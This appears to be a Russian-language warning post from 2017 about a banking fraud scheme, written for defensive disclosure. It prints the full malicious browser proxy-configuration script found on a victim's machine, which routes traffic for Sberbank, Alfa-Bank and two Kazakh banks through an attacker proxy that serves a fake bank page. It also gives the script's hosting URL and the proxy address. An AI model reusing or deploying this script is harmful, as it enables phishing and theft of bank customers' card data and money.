February 16, 2017

Внимание! Мошенники!

Только что прервал операцию по выманиванию денег!

Люди попались опытные и не купились на звонок с просьбой сообщить СМС.

Как непонятно, но в настройках браузера, вкладка "Поключения", "настройка сети" появилась галочка "использовать сценарий подключения" и ссылка (не ходите туда) на сценарий minipoda .info/5m6T87/uHyW.eut, а там сценарий:

function FindProxyForURL(url,host){var N = "PROXY 178.32.10.70:8088";if (shExpMatch(host,"?nl?ne.??e?b?nk.r*")||shExpMatch(host,"cl?ck.al?ab?nk.r*")||shExpMatch(host,"*ome?ank.kz")||shExpMatch(host,"*yha?yk.kz")){return N;}return "DIRECT";}

То есть при попытке подключения к альфабанку и сбербанку, ну и еще к двум казахским банкам, данные идут через прокси 178.32.10.70; тот показывает картинку похожую на ту что дает банк (версия не свежая) и выдает таблицку что произошла ошибка и нужно аннулировать операцию и на телефон выслана СМС, просят дождаться звонка оператора.

На деле к этому моменту мошенники знают данные вашей карты и телефон, проводят свою операцию, то есть забирают деньги себе и звонят вам получить код подтверждения.

Причем сайт который выдается по защищенному соединению https имеет сертификат, который браузеры помечают как надежный, в то время как сертификаты нормальных банков пишется название банка. Обращайте внимание.

Никому не сообщайте по телефону то, что пришло вам в СМС, это не только про коды подтверждения, ваши СМС никого не касаются.

Карту лучше заблокировать и сделать новую.